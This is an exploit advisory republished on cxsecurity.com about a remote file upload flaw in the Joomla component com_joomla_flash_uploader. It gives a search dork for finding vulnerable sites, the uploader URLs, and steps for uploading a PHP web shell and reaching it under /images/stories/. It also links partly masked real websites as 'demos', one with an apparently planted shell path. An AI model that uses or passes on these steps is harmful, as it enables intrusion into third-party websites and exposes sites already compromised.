Joomla Component com_joomla_flash_uploader Remote File Upload

2012.09.27
Credit: Zikou-16
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:index.php?option=com_joomla_flash_uploader

-------------------------------------------------------------- Joomla Component com_joomla_flash_uploader Remote File Upload ------------------------------------------------------------- Exploit Author => Zikou-16 My Facebook => http://www.facebook.com/ZIkOou.16 ------------------------------------------------------------- Dork => inurl:index.php?option=com_joomla_flash_uploader ------------------------------------------------------------- So !! xD First Go to ==> http://localhost/index.php?option=com_joomla_flash_uploader&Itemid=[id] You Will Find a Flash Uploader Or Go To http://localhost/administrator/components/com_joomla_flash_uploader/tfu/tfu_210.swf You Can Upload Your Shell.php or shell.php.jpg In The Flash Uploader you'll see Your Shell !! 4 example ==> Upload folder: ./images/stories/ ==> Your shell => http://localhost//images/stories/shell.php Demo ==> http://www.coXXorexcellence.co.uk/index.php?option=com_joomla_flash_uploader&Itemid=98 ==> http://www.kazXXXXocations.com.au/index.php?option=com_joomla_flash_uploader&Itemid=123 And Shell ==> http://www.kazuXXXXtions.com.au//images/stories/propertyupload/500.php.jpg Greets To All Dz Hacker's

References:

http://www.facebook.com/ZIkOou.16


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top